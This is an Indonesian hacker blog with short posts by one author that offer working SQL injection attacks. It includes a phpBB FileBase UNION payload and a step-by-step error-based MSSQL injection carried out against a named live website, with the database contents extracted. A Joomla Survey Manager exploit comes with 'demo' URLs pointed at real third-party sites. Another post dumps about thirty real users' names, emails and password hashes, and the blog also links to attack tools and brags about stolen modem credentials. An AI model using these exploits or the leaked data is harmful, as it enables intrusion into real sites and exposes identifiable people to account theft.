Owened lagi
Posted on 11.47 by CS-31
Posted on 00.28 by CS-31
Posted on 16.52 by CS-31
langsung aja deh ini vidio tutornya hehehee
http://www.4shared.com/file/161026854/8824db38/SQLITheCyber.html
Posted on 08.17 by CS-31
--==+================================================================================+==--
--==+ [phpBB MOD] FileBase SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
AUTHOR: kimmo
SITE: indonesianhacker.org
DORK: inurl:"filebase.php" "Powered by phpBB" or inurl:"filebase.php"
DESCRIPTION:
EXPLOITS:
filebase.php?d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,
char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*
NOTE/TIP:
phpbb prefix may need changining.
GREETZ: indonesianhacker.org, and all member !
--==+================================================================================+==--
--==+ [phpBB MOD] FileBase SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
# IndonesianHacker.org [2009-11-27]
Posted on 06.22 by CS-31
Posted on 05.16 by CS-31
untuk mempermudah kita untuk menginjection web
ada toolnya
silakan di downlioad disini
http://www.4shared.com/file/160781851/945b34a3/SQL_Helper_ctnet.html
Posted on 13.11 by CS-31
langsung aja g usah banyak bacot download aja tutornya
ini http://www.youtube.com/watch?v=M9biOFTMIDI&layer_token=12251d44867ab0f6
Posted on 12.20 by CS-31
Posted on 15.01 by CS-31
Posted on 14.31 by CS-31
buat kamu yang pengen bisa cara rooting ato jumping dari 1 website ke web lain
silakan diliat vidio ini
hihihihi
Posted on 18.33 by CS-31
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12
CEK VULN / GAK !!!
==================
Cek Bisa di Inject apa gak dgn cara tambah kan tanda ' di akhir URL
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12'
Jika Error nya seperti ini :
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' AND t.TopicID = m.topicID '.
/main/ListPosts.asp, line 56
Microsoft OLE DB Provider (SQL Server Driver) <---- Inti nya ada di sini !!!
Selain SQL Server Driver (Provider) ndak tau deh gua :D
maka Lanjut ...
CARI STRUKTUR TABEL !!!
=======================
1) Debugging
Debugging di sini untuk memunculkan pesan error dr MsSQL.
SQL Inject nya adalah "and 1="
2) Munculkan nama tabel
Query nya : and 1=convert(int,(select top 1 table_name from information_schema.tables))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables))--
Error yang muncul adalah :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Merchants' to a column of data type int.
/main/ListPosts.asp, line 56
bisa dilihat di situ kita dapat tabel dengan nama "Merchants".
berbeda dgn MySQL, MsSQL dalam output nya membedakan tipe data, sehingga kita perlu mengkonversi nya agar SQL dapat memunculkan pesan error yang kita inginkan.
skrg kita cari tabel selanjut nya.
Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--
Error yang muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'category' to a column of data type int.
/main/ListPosts.asp, line 56
Bisa di lihat Query nya berbeda dgn MySQL. MySQL ndak support "not in" sedangkan MsSQL support "not in" ^^
nah dapat tabel dgn nama "category" .... kita coba cari lagi tabel selanjut nya.
Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--
Error yng muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Codes' to a column of data type int.
/main/ListPosts.asp, line 56
dapat tabel dgn nama "Codes". Silahkan cari lagi nama tabel yang di inginkan.
CARI STRUKTUR COLUMN !!!
========================
Contoh kita mau cari column yg ada di tabel "Merchants".
Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--
Error yg muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantId' to a column of data type int.
/main/ListPosts.asp, line 56
dapat deh column dgn nama "merchantId" ... yok cari lagi column laen :D
QUery : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--
Error yg muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'address' to a column of data type int.
/main/ListPosts.asp, line 56
dapat deh column "address". cari lage column ne ...
Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--
Error yg muncul:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantName' to a column of data type int.
/main/ListPosts.asp, line 56
dapat tuh column "merchantName" ekkekekeke ....
Silahkan kalo mo nyari lagi ^^
PENGAMBILAN DATA !!!
====================
Contoh kita mau lihat isi dari column "merchantid, address, merchantName" yg ada di tabel "Merchants".
Query : and 1=convert(int,(select top 1 merchantid from merchants))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 merchantid from merchants))--
Error yg muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc' to a column of data type int.
/main/ListPosts.asp, line 56
dapat "merchantid" = "alohacc".
nah gmn kalo mau ngambil isi column ne sekaligus ??
Query : and 1=convert(int,(select top 1 merchantid%2b':'%2baddress%2b':'%2bmerchantName from merchants))--
Error yg muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc:154 West Coast Rd Ginza Plaza #B1-55 S(127371):aloha Cybercafe' to a column of data type int.
/main/ListPosts.asp, line 56
Note : %2b = + sedangkan ':' = pembatas
untuk vidionya silakan download disini
from : c0li.blogspot.com
Posted on 14.35 by CS-31
Posted on 00.23 by CS-31
Posted on 09.38 by CS-31
Posted on 08.42 by CS-31
Posted on 15.13 by CS-31
Posted on 14.44 by CS-31
Posted on 03.19 by CS-31
[ ] 8633 User: JoeyK. | Email: stormstoys@aol.com | Password: e3c9340fac47689a01a8dcdce6d42e27
[ ] 8547 User: killer777 | Email: corbinbroncos@hotmail.com | Password: 1871e1fde6e5a59fcb048c5aaefba906
[ ] 8561 User: Olly | Email: Cobain6794@hotmail.co.uk | Password: 96518056f8c3d6c2e12aae704ecf97a5
[ ] 7996 User: runemaster7 | Email: andrew_kelly1@hotmail.com | Password: 9c4de1160b65c3538dd7de43d3e5853b
[ ] 3945 User: devils elbow | Email: devils.3lbow@gmail.com | Password: a42cbaa82b00c61d89d06b43dc1f7923
[ ] 3806 User: profile | Email: stop----@hotmail.com | Password: 9ffa1dbaeb556c5d896d19f32d481308
[ ] 2943 User: sykoticmynde | Email: joeall9339@yahoo.com | Password: d8578edf8458ce06fbc5bb76a58c5ca4
[ ] 1410 User: jetgrind | Email: jetgrind3001@yahoo.com | Password: 5f4dcc3b5aa765d61d8327deb882cf99
[ ] 451 User: Someguy | Email: adil_sunesara@sbcglobal.net | Password: f379eaf3c831b04de153469d1bec345e
[ ] 4 User: Soul Deciever | Email: hellzwing@gmail.com | Password: e19d5cd5af0378da05f63f891c7467af
[ ] 5 User: BlckMajick | Email: wilfshaw14@msn.com | Password: e30ed146aea4462c10943f0c43a5e188
[ ] 172 User: helix | Email: russell@macrosupport.net | Password: f83f821348e7f43ad56d0885a02e8dff
[ ] 8 User: Rune Cheater | Email: Game_dragons@hotmail.com | Password: 5a90e81c96efffa14c13b49b1cf56574
[ ] 2983 User: optics | Email: metallica_kicks_ass7@hotmail.com | Password: 3c2234a7ce973bc1700e0c743d6a819c
[ ] 9 User: Che$$ | Email: chess_scripter@hotmail.com | Password: d4bb6a3d9294a3217acd531c3ac47cf5
[ ] 10 User: abdulrahman1 | Email: abdulredflames11@yahoo.com | Password: 4fc7c3cfabad4f8327a1f4b19a006b4d
[ ] 469 User: Horny | Email: gundamwing_gzp@hotmail.com | Password: 7c84f797d1db435302a99e2a2e7e9765
[ ] 470 User: stierke2 | Email: thomasclaessens1@gmail.com | Password: 5583413443164b56500def9a533c7c70
[ ] 11 User: Perpetua | Email: fagexpassforperpetua@starcade.be | Password: ae97d69a02e3a65a40d6ef077f4015f1
[ ] 7813 User: andy034 | Email: pimping_bananas@hotmail.com | Password: ebcfd5a11d7cf5ba89f838fc766be7a4
[ ] 169 User: LiQuiD FrEEzE456 | Email: 1 | Password: 7ab944f5c994702ddf9bffc30eab7e07
[ ] 1604 User: Rs_Pmod | Email: rs_pmod@hotmail.com | Password: 0de8a2fe1769c2cbf6346de6de822d97
[ ] 1578 User: sjsbts | Email: centralidiotclub@yahoo.com | Password: ba99d415b962ebc0ebfba4776fb3636e
[ ] 948 User: justanothercheater | Email: pk_diablo@cox.net | Password: 5f4dcc3b5aa765d61d8327deb882cf99
[ ] 170 User: sexpistols | Email: | Password: 2b877b4b825b48a9a0950dd5bd1f264d
[ ] 13 User: Fanta | Email: mountain_dewil@hotmail.com | Password: f66290fb3be63da4f5e7eb1b5564dc21
[ ] 8013 User: DannRS | Email: briggs@phreaker.net | Password: 05b8c74cbd96fbf2de4c1a352702fbf4
[ ] 7963 User: Kevin2692 | Email: kvn_bly@yahoo.com | Password: 00bfc8c729f5d4d529a412b12c58ddd2
[ ] 2910 User: stingray | Email: Nathan@thelanlounge.co.uk | Password: 1740f75dde346c3622387b0a61d8c7fe
Posted on 17.45 by CS-31
heeeem hari ini adalah hari yang membuat aku capek hihihi
dimana hari ini satu malem aku abis hacking modem speedy
n dapet sak ambrek username n password huhf
capek
heeeem
pengen tau tah tutornya
silakan download vidionya disini
Posted on 13.33 by CS-31
[+] Vendor : http://www.focusdev.co.uk/
[+] Download : http://www.focusdev.co.uk/products/8-joomla-products/17-survey-manager
[+] version : 1.5.0
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_surveymanager"
#############################################################################################################
[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_surveymanager&task=editsurvey&stype=[SQL]
[ Exploit ]
-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--
[ Demo ]
http://portal.psz.utm.my/div/btk/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--
http://www.acs-stny.com/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--
http://ridsrealty.com/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--
Designed by CYBER | Indonesian Hacker